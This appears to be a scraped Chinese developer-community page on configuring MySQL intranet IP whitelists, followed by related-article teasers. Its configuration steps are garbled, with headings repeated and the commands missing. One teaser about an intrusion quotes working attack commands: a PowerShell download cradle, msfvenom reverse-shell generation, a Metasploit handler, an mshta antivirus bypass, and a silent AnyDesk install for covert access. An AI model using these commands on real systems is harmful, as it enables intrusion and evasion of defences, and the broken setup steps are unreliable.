开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

mysql 内网连接白名单

基础概念

MySQL 内网连接白名单是一种安全机制，用于限制只有特定的内网 IP 地址或 IP 地址段才能连接到 MySQL 数据库服务器。这种机制可以有效防止未经授权的外部访问，提高数据库的安全性。

相关优势

安全性提升：通过限制只有特定的内网 IP 地址可以连接，可以有效防止外部攻击和未授权访问。
访问控制：可以根据需要灵活配置允许连接的 IP 地址，实现精细化的访问控制。
合规性：符合许多行业和地区的安全标准和法规要求。

类型

MySQL 内网连接白名单通常分为以下几种类型：

IP 地址白名单：只允许特定的单个 IP 地址连接。
IP 地址段白名单：允许一个范围内的 IP 地址连接。
子网白名单：允许一个子网内的所有 IP 地址连接。

应用场景

企业内部系统：在企业内部网络中，只允许特定的服务器或工作站连接数据库。
云服务环境：在云环境中，只允许特定的虚拟机或容器连接数据库。
开发测试环境：在开发和测试环境中，只允许特定的开发或测试机器连接数据库。

遇到的问题及解决方法

问题：为什么无法连接到 MySQL 数据库？

原因：

IP 地址未在白名单中：尝试连接的 IP 地址不在配置的白名单中。
防火墙设置：防火墙可能阻止了连接请求。
网络配置：网络配置错误，导致无法正确访问数据库服务器。

解决方法：

检查白名单配置：确保尝试连接的 IP 地址在白名单中。
检查白名单配置：确保尝试连接的 IP 地址在白名单中。
检查防火墙设置：确保防火墙允许从尝试连接的 IP 地址到数据库服务器的连接。
检查网络配置：确保网络配置正确，能够正确访问数据库服务器。

问题：如何配置 MySQL 内网连接白名单？

解决方法：

登录 MySQL 数据库：
登录 MySQL 数据库：
配置白名单：
配置白名单：
重启 MySQL 服务（如果需要）：
重启 MySQL 服务（如果需要）：

参考链接

通过以上步骤和配置，可以有效实现 MySQL 内网连接白名单，提升数据库的安全性和访问控制能力。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

MySQL连接错误的十二“坑”

环境准备自建MySQL环境主机主机：iZbp1e*****krn92qrx0Z 内网ip: 10.26.254.217 客户端ecs主机主机：iZbp1e6*****zkrn92qrwzZ 内网ip: 10.24.236.231 说明说明：mysql的account的组成为’user’@’host’ 常见问题分析 ERROR 1045 (28000) 现象描述 ERROR 1045 (28000): Access denied for user 'testcon'@'10.24.236.231' (

09

云数据库如何设置自动重连？连接云数据库时需要注意什么？

云数据库是企业和公司进行管理的好帮手，也为企业和公司提高工作效率提供了客观条件。对于企业来说，要想让云数据库发挥作用，最基本的就是使云数据库和企业服务器保持连接，但是在某些特殊情况下，云数据库和企业服务器会断开连接，这对于企业的管理来说非常不利，容易造成数据丢失，那么云数据库如何设置自动重连？

03

让木马 DNS 数据传输成为历史：看我怎么让 xshell 病毒失效

00

让木马病毒DNS数据传输成为历史：看我如何让XShell病毒失效

基础词汇解释： DnsA记录传输：利用dns解析过程，在请求解析的域名中包含需外传的数据，如xxxxxx.hack.com。则最终hack.com的dns服务器会收到xxxxx这个数据回传。 dns的txt类型回包：一般指为某个主机名或域名设置的说明，可被黑客利用回传数据。终端请求某恶意域名的dns解析，dns返回txt记录，包含黑客需要的回传内容，如模块更新数据、指令等概述：随着越来越多的公司安全意识提高，大量公司已封锁socket通信，仅允许员工通过http/https协议外网，同时采取了越来越

07

组复制安全 | 全方位认识 MySQL 8.0 Group Replication

本节从组复制的IP白名单以及安全套接字(SSL)支持两个方面来介绍如何保护组合组成员之间连接的安全性。

01

SSRF漏洞是什么，如何修复？

在一次内部安全月审查过程中，某业务内部查出有ssrf漏洞，通过伪造url路径，可以看到暴露内网ip，存在较高安全隐患。

03

业务开发时，接口不能对外暴露怎么办？

在业务开发的时候，经常会遇到某一个接口不能对外暴露，只能内网服务间调用的实际需求。面对这样的情况，我们该如何实现呢？今天，我们就来理一理这个问题，从几个可行的方案中，挑选一个来实现。

03

openwrt一些问题的解决方案

我的路由器连接着学校的网口，然后自己的 PC 机插着路由器的 lan 口，有时我会需要将 PC 的网线从路由器上拔下来插到学校的网口，然后再次插到路由器的 lan 口时就会发生上不了网的现象

02

服务出错优先考虑及排查手册(待续整理)

文章时间：2020年8月7日 15:40:45 解决问题：服务出错各项参数排查端口问题端口问题主要排查2个方面云服务器控制台（安全组）本地服务器配置服务器启动问题检测一下各个服务的状态，是否正常，是否都启动着。 ps -ef|grep java ps -ef|grep nginx ps -ef|grep redis ps -ef|grep mysql 等等一系列的服务，均检查一下。微信类开发检查微信类的开发，均需要内网访问公网微信上的一些接口，优先检查安全组的问题。微信开发检查a

01

MLBSP - 我的世界轻量化基础开服包

Minecraft 轻量基础开服包 Minecraft Lightweight Basic Server Pack.

03

一人有网全村不慌！两种方法突破局域网封锁。

哟！亲们好久不见，今天为大家带来的文章是如何利用一台联网电脑来突破局域网封锁，一起来看一下吧！

02

云堡垒机架构设计漫谈

云平台控制台，是云租户资源管理的集中入口，堡垒机实例作为一种标准的云产品资源，用户同样可以通过云平台对堡垒机资源进行管理。

Java限制IP访问页面

最近遇到一个需求，一个只能内网访问的网站，需要限制ip访问。就是网站内的部分文章只有白名单内的ip才能打开。因为是静态化的网站，所有文章都是静态html页面。所以首先想到的就是直接js获取访问者ip然后再判断是否在白名单内，不在白名单内就到没有权限页面。

05

绕过应用程序白名单技巧

在内网渗透中，经常会在内网主机执行执行的渗透工具的时候出现执行不起来的情况，很多时候是由与安全软件做了白名单限制，只允许指定的白名单中的应用程序启动，这时我们就需要利用白名单中的程序做我们想做的事情，执行我们想要执行的程序，下面就给大家分享几个绕过白名单执行应用程序的姿势。

00

HW行动在即-工控安全突破口之-主机防护

一年一度护网马上就要到来了，人们又开始骚动了，对于经历了两届HW行动的我们来讲，最痛的莫过于碰到甲方临时请来的“雇佣兵”

03

记一次从Jboss到3389远程桌面案例

翻看磁盘文件时发现“Exlive GPS车辆定位服务平台”安装目录下有一个conf.xml配置文件，存储着这个定位服务平台的相关配置信息，包括MSSQL数据库的用户和密码。 ipconfig /all命令下发现这台主机有两个网卡，公网：47.**.***.77，内网：10.28.176.131，两个内网DNS服务器：10.143.22.116、10.143.22.118，并且可以与外网进行通讯。 0x04 绕过主动防御上线测试了以前常用的Powershell混淆法，不过已经被360主动防御拦了，微软defender也会检测ps1脚本内容。所有免杀和绕过方式都有时效性，一旦被公布被查杀和拦截也正常（早晚的事）。 powershell $a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://url:8888/360.ps1''))';IEX ($a+$b) web_delivery、hta_server模块肯定更不行了，最终我们是利用Mshta.exe白名单方式成功绕过360主动防御得到目标主机Session会话，执行getsystem即可提升为SYSTEM，执行命令如下。 1、生成载荷并编码 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=155.**.***.16 lport=443 -f raw > /tmp/shellcode.bin cat /tmp/shellcode.bin | base64 -w 0 2、配置监听模块参数 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 155.**.***.16 set lport 443 exploit 3、目标主机执行载荷 mshta http://155.**.***.16:8888/bypass360.hta 注：mshta白名单貌似只能用x86的Payload，执行成功后会自动迁移至32位的rundll32.exe进程，所以就可能会出现由werfaylt.exe弹出的下图报错，所以个人建议在得到Session后迁移至x64进程，并执行taskkill /f /im werfaylt.exe命令将该进程结束掉。 0x05 绕过异地登录提醒虽然已经是最高权限了，但由于这台主机为阿里云，且存在360主动防御，就不添加用户进行远程桌面连接了，因为360会拦截添加用户，而且远程桌面连接时会触发异地登录提醒。为避免触发异地登录提醒，我们可以利用AnyDesk来进行绕过，将AnyDesk.exe和静默安装批处理文件上传至可读写目录中，然后在命令行下执行该批处理文件获取连接ID。注：如果等待时间过长，一直卡着不动获取不到连接ID时可结束当前命令行，重新进入命令行执行anydesk --get-id命令来获取连接ID。 @echo off AnyDesk.exe --install "C:\ProgramData\AnyDesk" --silent echo licence_keyABC | "C:\ProgramData\AnyDesk\AnyDesk.exe" --register-licence echo anydesk!@# | "C:\ProgramData\AnyDesk\AnyDesk.exe" --set-password choice /t 10 /d y /n >nul for /f "delims=" %%i in ('anydesk --get-id') do set CID=%%i echo Connection ID Is: %CID% 接着我们使用静默安装批处理文件中设置的固定连接密码和获取到的连接ID即可连接到目标主机的远程桌面，成功的绕过了阿里云主机的异地登录提醒。至此，全文结束，内网就不搞了！！！

03

银联分布式数据库安全设计

随着个人信息和隐私数据对于保密要求越来越高，各行各业对安全的要求也越来越高。而支撑各行各业的信息系统在设计和开发时，面临着安全方面的新挑战。数据库作为信息系统中数据存储和数据管理一个重要模块，其安全和设计显得尤为重要。近年来，分布式数据库在金融业加速落地，金融机构对分布式数据库安全有哪些需求？金融机构分布式数据库要如何进行安全设计？

04

day11 | 网络安全应急响应典型案例(挖矿类)

近几年，除勒索病毒外，挖矿木马也越来越流行，多为利用漏洞利用、“永恒之蓝下载器”、弱口令暴破等手段完成攻击，由于其具有较强的隐蔽性，会利用一些手段避开受害者活动时间，利用受害者空闲时间进行挖矿，长此以往，服务器、主机显卡或CPU长期占用过高，导致电脑性能降低，同时攻击者会利用已控制的挖矿主机攻击其他设备，导致业务中断甚至更严重的网络安全事件的发生。

02

MySQL的防火墙功能

防火墙——将保护您免受任何软件中至少50%的所有类型的攻击。MySQL在企业版里为用户提供了防火墙功能。

01

数据库中间件DBLE学习(三) 学习配置server.xml

一周以前遇到一个的故障，我靠着过去的经验去分析问题，这次栽的挺深的，查错了方向，陷进了错误的方向苦思不得其解。本来是一个很简单的问题，明眼人一下就能看出来的，结果硬是分析了好几天。

大赛事源站设计

2. 全程自动化监控：对直播流信号，包括LOL官方播出渠道、合作的内外部直播平台进行信号实时监控，如遇服务器异常、流信号异常等突发情况，以产品化展示形式第一时间反馈通知到LOL直转播赛事经理；

02

linux杂谈 :ftp的企业应用级配置

这次我们来讲解黑名单，白名单以及内网和外网的ftp的访问的不同设置。 1.黑名单有的时候我们不想让某些本地用户登录，这个时候就要设置黑名单了，它在/etc/vsftpd下：如何添加一个用户到黑名单

05

MySQL的防火墙

徐老师写的这篇文章《MySQL防火墙》给我们介绍MySQL防火墙功能，之前了解很少，学习借鉴一下。

01

Nginx实践--安全升级

之前写了一些nginx的东西，这次继续，主要使用upstream针对proxy_pass转发做个处理一般情况下我们在使用nginx反向代理的时候，都是如下配置，

03

MySQL防火墙

上一篇文章中介绍了SQL注入攻击，避免MySQL遭受SQL注入攻击的方法之一是使用防火墙。

02

1718总结与计划

2018年已经悄然到来，回望过去一年，收获很多，感恩很多。未来一年，内心充满了期待，无论是工作还是生活，将会发生很大变化。大年初一的晚上，将自己的所思所想记录下来，与大家分享，激励自己18年更努力。

07

Lniux服务器安全访问控制

/etc/hosts.deny *脚本 /root/SSH_Deny_Rule.sh

03

hw面试题解答版(2)

2.可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。对于不同 XML 解析器,对外部实体有不同处理规则,在 PHP 中默认处理的函数为: xml_parse 和 simplexml_load xml_parse 的实现方式为 expat 库，默认情况不会解析外部实体,而 simplexml_load 默认情况下会解析外部实体,造成安全威胁.除 PHP 外，在 Java，Python 等处理 xml 的组件及函数中都可能存在此问题

02

开源全链路压测平台Takin实践笔记

2.链路治理：能够帮助业务和微服务架构分析业务链路，以技术方式获得功能视角的链路信息；

05

微服务开发时，接口不能对外暴露怎么办？

在业务开发的时候，经常会遇到某一个接口不能对外暴露，只能内网服务间调用的实际需求。面对这样的情况，我们该如何实现呢？

03

iptables相关操作

显示规则 iptables -L iptables -t nat -L # 显示转发规则设置端口白名单 # 允许22，80，443 端口访问 iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A INPUT -p tcp --dport 80 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A INPUT -p tcp --dport 443 -j ACCEPT # 允许内网 iptab

02

系统的讲解 - PHP WEB 安全防御

SQL注入攻击是通过WEB表单提交、URL参数提交或Cookie参数提交，将怀有恶意的“字符串”，提交到后台数据库，欺骗服务器执行恶意的SQL语句。

02

2021HW参考|防守方经验总结

从五月19日到六月底（2019年）一直在参与HW行动，第一次参与从甲方角度的攻防对抗的团队当中，总体来说感触很大，谨此记录下。

03

第86篇：顶级加密勒索组织LockBit的防御方法（参考国外报告）

大家好，我是ABC_123。在前面两期着重给大家讲解了最近比较活跃的顶级加密勒索组织LockBit相关情况，包括他的钻石模型、攻击者画像、攻击案例、技战法分析等等，使大家对LockBit有了一个比较深入的了解。本期ABC_123给大家分享这一系列的最后一篇文章，讲讲如何防御加密勒索攻击。

01

MySQL企业版之Firewall（SQL防火墙）

1. 关于Firewall插件2. Firewall插件的工作方式3. Firewall插件测试4. 总结延伸阅读

03

MGR的一些细节

单主模式：只有一个成员对外提供服务。单主模式和异步模式比较类似，有了主从复制的经验，维护单主模式的MGR其实并不难，下面的图说明了单主模式下的一些特点：

02

Java限制IP访问页面实现方式

🌷🍁 博主 libin9iOak带您 Go to New World.✨🍁 🦄 个人主页——libin9iOak的博客🎐 🐳 《面试题大全》文章图文并茂🦕生动形象🦖简单易学！欢迎大家来踩踩~🌺 🌊 《IDEA开发秘籍》学会IDEA常用操作，工作效率翻倍~💐 🪁🍁 希望本文能够给您带来一定的帮助🌸文章粗浅，敬请批评指正！🍁🐥

01

Springboot 整合阿里数据库连接池 druid

启动项目后，访问页面127.0.0.1:8080/druid/index.html，就可以访问监控页面了，其中ip和端口号为项目的ip和端口号。

02

屏蔽国外IP访问的几种常用方法

网站的客户和受众人群都是国内的，不想让国外访问；或者站长监测到国外肉鸡一直有扫描或攻击。这时就需要对境外IP进行进行过滤和屏蔽；对IP进行过滤屏蔽一般有两种方法：加白和加黑。

08

Linux 搭建我的世界(MC) 基岩版服务器

Linux搭建Java版我的世界服务器教程：https://blog.zeruns.tech/archives/584.html

06

你的服务器够安全吗

近期服务器经常被暴力扫描、攻击, 故周末花时间打理下服务器, 将一些可能存在的风险处理掉. 笔者根据实践总结出一份简单的防范措施列表, 希望能对你有帮助.

00

互联网运维安全总结

出口安全不轻易暴露外网ip和服务端口；使用防火墙和路由器以及云上的NAT网络，只映射web服务、V**，其他暴露服务进行都进行访问控制 web请求服务器时通过CDN 服务既提高静态资源加载速度，同时也隐藏了真实的源地址系统安全 Linux 使用iptables定制白名单策略访问策略 Windows 通过防火墙策略和组策略->ip策略控制服务 Linux系统自带访问控制配置：白名单/etc/hosts.allow、黑名单/etc/hosts.deny 登录审计堡垒机让线上操作更加

02

如何在云开发Cloudbase中使用Redis？

首先，我们简单的来再了解一下什么是云开发Cloudbase：云开发是腾讯云为移动开发者提供的一站式后端云服务，可用于开发多种客户端，它帮助开发者统一构建和管理资源，免去了应用开发过程中繁琐的服务器搭建及运维、域名注册、数据接口实现等繁琐流程，让开发者可以专注于业务逻辑的实现，而无需理解后端逻辑及服务器运维知识，开发门槛更低，效率更高。

如何开发业务网关？

微服务架构中网关层属于业务方能处理用户请求的第一层，网关设计是否合理直接影响到整个系统的稳定性、吞吐量和安全性。基于微服务架构的分层原则，我们尽量在网关层处理整个系统的通用业务逻辑，网关层尽可能的“薄”一些。

03

技术分享 | OceanBase 安全审计之传输加密

之前我们讲了关于 OceanBase 安全审计的《身份鉴别》和《用户管理与访问》两个部分，OceanBase 的安全机制介绍其支持传输加密，今天我们主要来实践一下如何配置传输加密以及验证是否真的加密。

03

个性化推荐系统（七）--- ABTest ab测试平台

本文介绍了ABTest平台在个性化推荐系统、搜索引擎、广告系统等领域的应用，以及通过ABTest平台实现算法优化、服务提升、数据效果提升等作用。

08

006.FTP用户访问控制配置

注意：Linux中采用最小（严）匹配，若黑白名单冲突，即用户同时写入两个文件，则优先匹配黑名单。

02

vulntarget-i 打靶记录

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

01

vulntarget-i 打靶记录

乌鸦安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。

03

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭